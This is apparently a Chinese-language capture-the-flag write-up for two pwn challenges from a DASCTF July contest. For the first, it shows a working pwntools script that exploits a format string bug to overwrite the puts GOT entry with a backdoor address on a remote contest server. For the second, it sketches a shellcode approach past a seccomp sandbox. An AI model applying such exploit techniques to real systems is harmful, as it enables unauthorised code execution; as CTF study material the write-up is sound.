登录后台

页面导航

本文编写于 124 天前,最后修改于 123 天前,其中某些信息可能已经过时。

虚假的签到题

题目描述:虚假的签到题

题目分析

开了NX保护

用ida32打开,是个格式化字符串漏洞,有后门函数

漏洞利用

直接写puts函数的got表就ok了

#coding:utf8
from pwn import *
#context.log_level = 'debug'

elf = ELF('qiandao')
sh = process('./qiandao')
sh = remote('183.129.189.60',10013)
backdoor = 0x0804857D
sh.recvuntil('name:\n')
sh.sendline(fmtstr_payload(8, {elf.got['puts']: 0x0804857D}))
sh.interactive()

eg32

题目描述:Where is my flag???

题目分析

保护都没开

ida无法反编译,从报错的地方开始看原因

程序会直接调用我们输入的内容,所以直接输入shellcode就可以,但是注意前面有个 call sub_804862B,这里有沙箱,类似于orw那道题,由于文件开始运行会读flag,需要本地建立flag文件,用seccomp-tools看禁用了哪些函数,open和openat都禁用了,前面程度读了flag,说明这道题真正解决方式是从文件流里读

漏洞利用

直接search,箭头指向的这个是一个随机地址,这是mmap分配出来的一块随机地址


等了好几天终于等到了wp:DASCTF-7月赛
有点恶心了,爆破,还是万分之一的几率


bigbear